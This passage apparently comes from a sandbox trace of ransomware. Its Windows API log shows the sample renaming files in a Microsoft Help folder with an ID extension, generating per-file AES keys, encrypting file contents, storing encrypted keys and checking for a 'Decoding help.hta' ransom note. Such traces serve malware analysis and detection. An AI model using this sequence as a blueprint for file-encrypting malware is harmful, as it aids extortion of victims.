Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn")) returned 1 [0041.178] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0041.178] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0041.178] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0041.179] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0041.179] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0041.179] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.INFOPATHEDITOR.14.1033.hxn") returned -1 [0041.179] lstrlenW (lpString="MS.INFOPATHEDITOR.14.1033.hxn") returned 29 [0041.179] lstrcmpiW (lpString1="[ID]", lpString2=".hxn") returned 1 [0041.179] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0041.179] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0041.179] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0041.179] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0041.179] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0041.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x270 [0041.181] CreateFileMappingA (hFile=0x270, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3d4 [0041.181] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x34492d0) returned 1 [0043.828] CryptGenKey (in: hProv=0x34492d0, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5d8610) returned 1 [0043.828] CryptExportKey (in: hKey=0x5d8610, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0043.828] MapViewOfFile (hFileMappingObject=0x3d4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160) returned 0x4420000 [0044.088] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0046.699] CryptEncrypt (in: hKey=0x5d8610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4420000*, pdwDataLen=0x6c4fce4*=0x160, dwBufLen=0x160 | out: pbData=0x4420000*, pdwDataLen=0x6c4fce4*=0x160) returned 1 [0046.699] UnmapViewOfFile (lpBaseAddress=0x4420000) returned 1 [0046.700] CloseHandle (hObject=0x3d4) returned 1 [0046.700] CryptDestroyKey (hKey=0x5d8610) returned 1 [0046.700] CryptReleaseContext (hProv=0x34492d0, dwFlags=0x0) returned 1 [0046.700] SetFilePointerEx (in: hFile=0x270, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.700] WriteFile (in: hFile=0x270, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.701] WriteFile (in: hFile=0x270, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.701] CloseHandle (hObject=0x270) returned 1 [0046.702] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.703] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0046.703] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0046.703] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0046.703] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0046.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0046.703] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSACCESS.14.1033.hxn") returned -1 [0046.703] lstrlenW (lpString="MS.MSACCESS.14.1033.hxn") returned 23 [0046.703] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0046.703] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0046.703] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.MSACCESS.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0046.703] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0046.703] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.797] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0046.797] CreateFileMappingA (hFile=0x4a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0046.797] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x344a0a0) returned 1 [0046.798] CryptGenKey (in: hProv=0x344a0a0, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5a52b0) returned 1 [0046.798] CryptExportKey (in: hKey=0x5a52b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0046.798] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x3210000 [0046.800] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0046.800] CryptEncrypt (in: hKey=0x5a52b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3210000*, pdwDataLen=0x6c4fce4*=0x140, dwBufLen=0x140 | out: pbData=0x3210000*, pdwDataLen=0x6c4fce4*=0x140) returned 1 [0046.800] UnmapViewOfFile (lpBaseAddress=0x3210000) returned 1 [0046.802] CloseHandle (hObject=0x270) returned 1 [0046.802] CryptDestroyKey (hKey=0x5a52b0) returned 1 [0046.802] CryptReleaseContext (hProv=0x344a0a0, dwFlags=0x0) returned 1 [0046.802] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.803] WriteFile (in: hFile=0x4a8, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.804] WriteFile (in: hFile=0x4a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.804] CloseHandle (hObject=0x4a8) returned 1 [0046.805] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.805] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0046.805] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0046.805] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0046.805] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0046.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0046.805] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSACCESS.DEV.14.1033.hxn") returned -1 [0046.805] lstrlenW (lpString="MS.MSACCESS.DEV.14.1033.hxn") returned 27 [0046.805] lstrcmpiW (lpString1="[ID]", lpString2=".hxn") returned 1 [0046.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0046.805] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0046.805] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0046.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0046.806] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.806] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0046.807] CreateFileMappingA (hFile=0x4a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0046.807] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x344a0a0) returned 1 [0046.808] CryptGenKey (in: hProv=0x344a0a0, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5a5d70) returned 1 [0046.808] CryptExportKey (in: hKey=0x5a5d70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0046.808] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160) returned 0x3210000 [0046.810] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0046.810] CryptEncrypt (in: hKey=0x5a5d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3210000*, pdwDataLen=0x6c4fce4*=0x160, dwBufLen=0x160 | out: pbData=0x3210000*, pdwDataLen=0x6c4fce4*=0x160) returned 1 [0046.810] UnmapViewOfFile (lpBaseAddress=0x3210000) returned 1 [0046.812] CloseHandle (hObject=0x270) returned 1 [0046.812] CryptDestroyKey (hKey=0x5a5d70) returned 1 [0046.812] CryptReleaseContext (hProv=0x344a0a0, dwFlags=0x0) returned 1 [0046.812] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.812] WriteFile (in: hFile=0x4a8, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.813] WriteFile (in: hFile=0x4a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.813] CloseHandle (hObject=0x4a8) returned 1 [0046.814] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.814] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0046.815] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0046.815] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0046.815] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0046.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0046.815] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSOUC.14.1033.hxn") returned -1 [0046.815] lstrlenW (lpString="MS.MSOUC.14.1033.hxn") returned 20 [0046.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0046.815] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0046.815] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.MSOUC.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0046.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0046.815] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.493] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x974 [0060.493] CreateFileMappingA (hFile=0x974, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd68 [0060.493] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x10e28570) returned 1 [0060.494] CryptGenKey (in: hProv=0x10e28570, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x10bc5b10) returned 1 [0060.494] CryptExportKey (in: hKey=0x10bc5b10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0060.494] MapViewOfFile (hFileMappingObject=0xd68, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) Thread: id = 63 os_tid = 0xb30 [0039.394] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*", lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5530 [0039.395] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.395] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x6d8fd30 | out: lpFindFileData=0x6d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.395] 